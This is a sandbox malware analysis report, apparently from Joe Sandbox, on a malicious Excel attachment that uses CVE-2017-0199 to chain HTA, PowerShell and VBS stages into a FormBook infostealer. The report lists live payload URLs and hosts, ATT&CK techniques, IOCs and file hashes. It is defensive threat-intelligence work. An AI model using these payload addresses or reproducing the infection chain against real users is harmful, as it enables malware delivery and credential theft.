          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_exec.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information21
          Scripting          		Valid Accounts23
          Exploitation for Client Execution          		21
          Scripting          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		OS Credential Dumping1
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts111
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		311
          Process Injection          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory14
          System Information Discovery          		Remote Desktop Protocol1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)Logon Script (Windows)31
          Obfuscated Files or Information          		Security Account Manager21
          Security Software Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Install Root Certificate          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets41
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Masquerading          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
          Virtualization/Sandbox Evasion          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522509 Sample: PI#0034250924.xla.xlsx Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 72 Suricata IDS alerts for network traffic 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 11 other signatures 2->78 11 EXCEL.EXE 29 23 2->11         started        process3 dnsIp4 56 104.168.7.7, 49166, 49168, 49169 AS-COLOCROSSINGUS United States 11->56 58 og1.in 172.67.216.244, 443, 49165 CLOUDFLARENETUS United States 11->58 48 C:\Users\user\...\~$PI#0034250924.xla.xlsx, data 11->48 dropped 50 C:\Users\user\...\IEnetbookupdateion[1].hta, HTML 11->50 dropped 90 Microsoft Office drops suspicious files 11->90 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 52 104.21.78.54, 443, 49167 CLOUDFLARENETUS United States 16->52 54 og1.in 16->54 60 Suspicious command line found 16->60 62 PowerShell case anomaly found 16->62 20 cmd.exe 16->20         started        signatures9 process10 signatures11 80 Suspicious powershell command line found 20->80 82 PowerShell case anomaly found 20->82 23 powershell.exe 24 20->23         started        process12 file13 40 C:\Users\user\...netbookupdation.vbs, ASCII 23->40 dropped 42 C:\Users\user\AppData\...\ao24xfvf.cmdline, Unicode 23->42 dropped 84 Installs new ROOT certificates 23->84 27 wscript.exe 2 23->27         started        31 csc.exe 2 23->31         started        signatures14 process15 file16 44 C:\Users\user\AppData\Local\...\temp_exec.exe, PE32+ 27->44 dropped 86 Benign windows process drops PE files 27->86 88 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->88 33 temp_exec.exe 27->33         started        46 C:\Users\user\AppData\Local\...\ao24xfvf.dll, PE32 31->46 dropped 36 cvtres.exe 31->36         started        signatures17 process18 signatures19 64 Antivirus detection for dropped file 33->64 66 Machine Learning detection for dropped file 33->66 68 Writes to foreign memory regions 33->68 70 2 other signatures 33->70 38 aspnet_compiler.exe 33->38         started        process20

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PI#0034250924.xla.xlsx18%ReversingLabsWin32.Exploit.CVE-2017-0199
          PI#0034250924.xla.xlsx23%VirustotalBrowse
          PI#0034250924.xla.xlsx100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\temp_exec.exe100%AviraHEUR/AGEN.1332117
          C:\Users\user\AppData\Local\Temp\temp_exec.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
          http://crl.entrust.net/server1.crl00%VirustotalBrowse
          https://og1.in/0%VirustotalBrowse
          http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
          https://og1.in/Ts9zje0%VirustotalBrowse
          http://104.168.7.7/356/ce/IEnetbookupdateion.hta1%VirustotalBrowse
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
          http://104.168.7.7/356/IEnetbookupdation.vbsp0%VirustotalBrowse
          https://og1.in/Ts9zje#0%VirustotalBrowse
          http://104.168.7.7/356/IEnetbook0%VirustotalBrowse
          http://104.168.7.7/0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          og1.in
          		172.67.216.244
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://og1.in/Ts9zjefalseunknown
            http://104.168.7.7/356/ce/IEnetbookupdateion.htatrueunknown
            http://104.168.7.7/356/IEnetbookupdation.vbstrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://og1.in/Ts9zjeSmshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://og1.in/mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Smmshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://ocsp.entrust.net03mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://104.168.7.7/356/ce/IEnetbookupdateion.htacmshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://og1.in/Ts9zjet5mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://104.168.7.7/356/ce/IEnetbookupdateion.htasemshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://go.microspowershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://og1.in/Ts9zje.htalicymshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://og1.in/Ts9zjeI5mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://104.168.7.7/356/ce/IEnetbookupdateion.htaxomshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://104.168.7.7/356/IEnetbookupdation.vbsppowershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://104.168.7.7/356/IEnetbookupdation.vbsiptorpowershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaPmshta.exe, 00000004.00000003.487358638.0000000002F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://og1.in/Ts9zje#mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://104.168.7.7/356/IEnetbookpowershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://og1.in/Xmshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://104.168.7.7/mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://104.168.7.7/356/ce/IEnetbookupdateion.htattingskmshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.517798504.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://go.crpowershell.exe, 00000007.00000002.520144813.000000001A7A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.78.54
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                104.168.7.7
                                                		unknownUnited States
                                                		36352AS-COLOCROSSINGUStrue
                                                172.67.216.244
                                                		og1.inUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1522509
                                                Start date and time:2024-09-30 10:14:31 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 9s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Run name:Without Instrumentation
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PI#0034250924.xla.xlsx
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLSX@16/21@2/3
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 36
                                                • Number of non-executed functions: 51
                                                Cookbook Comments:
                                                • Found application associated with file extension: .xlsx
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Active ActiveX Object
                                                • Active ActiveX Object
                                                • Scroll down
                                                • Close Viewer

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                • Execution Graph export aborted for target mshta.exe, PID 3496 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                04:26:16API Interceptor50x Sleep call for process: mshta.exe modified
                                                04:26:20API Interceptor117x Sleep call for process: powershell.exe modified
                                                04:26:34API Interceptor82x Sleep call for process: wscript.exe modified
                                                04:26:40API Interceptor4x Sleep call for process: temp_exec.exe modified
                                                04:26:42API Interceptor3x Sleep call for process: aspnet_compiler.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.21.78.54PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                  SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                    PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                      PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        172.67.216.244SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              og1.inPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.216.244
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 172.67.216.244
                                                              PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.21.78.54

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AS-COLOCROSSINGUSSYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.245.123.6
                                                              PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 107.173.4.16
                                                              ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                              • 192.3.101.137
                                                              http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                              • 23.94.221.14
                                                              C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                              • 104.168.32.148
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                              • 107.172.130.147
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                              • 192.3.101.29
                                                              PO.xlsGet hashmaliciousRemcosBrowse
                                                              • 104.168.32.148
                                                              CLOUDFLARENETUSPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.216.244
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 172.67.216.244
                                                              PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.216.244
                                                              RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              CLOUDFLARENETUSPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.216.244
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 172.67.216.244
                                                              PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.216.244
                                                              RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              7dcce5b76c8b17472d024758970a406bPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              PO.xlsGet hashmaliciousRemcosBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244
                                                              Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                              • 104.21.78.54
                                                              • 172.67.216.244

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):15189
                                                              Entropy (8bit):5.0343247648743
                                                              Encrypted:false
                                                              SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                              MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                              SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                              SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                              SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
